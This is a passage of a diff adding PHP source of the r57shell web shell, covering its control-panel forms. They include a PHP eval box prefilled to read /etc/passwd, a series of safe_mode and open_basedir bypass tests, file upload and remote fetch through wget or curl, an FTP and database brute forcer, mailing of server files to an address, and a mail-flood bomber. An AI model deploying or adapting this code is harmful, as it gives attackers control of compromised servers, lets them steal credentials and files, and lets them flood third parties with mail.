+<option value="50">50</option>
+<option value="51">51</option>
+<option value="52">52</option>
+<option value="53">53</option>
+<option value="54">54</option>
+<option value="55">55</option>
+<option value="56">56</option>
+<option value="57">57</option>
+<option value="58">58</option>
+<option value="59">59</option>
+</select>'
+.in('hidden','cmd',0,'touch')
+.in('hidden','dir',0,$dir)
+.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+$select='';
+if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
+if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
+if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
+if($unix && $select){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
+echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));  
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
+echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+
+if($safe_mode || $open_basedir)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(),"5.2.0")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && $mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && $mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(),"5.2.0")<=0){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(),"5.2.0")<=0){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(),"5.2.0")<=0){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(),"5.2.0")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(),"5.2.0")<=0){
+echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.0.0")<0){
+echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(),"5.2.2")<=0){
+echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('error_log') && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('readfile') && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @version_compare(@phpversion(),"5.2.4")<=0)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;  
+}
+
+if(($safe_mode || $open_basedir) && @function_exists('symlink') && @version_compare(@phpversion(),"5.2.2")<=0)
+{
+echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;  
+}
+
+
+if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+if((!@function_exists('ini_get')) || @ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
+echo "<tr><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
+echo $te."</td><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
+echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+$select='';
+if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";}
+if(!$safe_mode){
+ if(which('wget')){$select .= "<option value=\"wget\">wget</option>";}
+ if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";}
+ if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";}
+ if(which('links')){$select .= "<option value=\"links\">links</option>";}
+ if(which('curl')){$select .= "<option value=\"curl\">curl</option>";}
+ if(which('GET')){$select .= "<option value=\"GET\">GET</option>";}
+}
+if($select){
+ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
+ echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select
+."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+ echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+ echo $te.'</div>'.$table_end1.$fe;
+}
+
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
+echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+
+echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up2.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
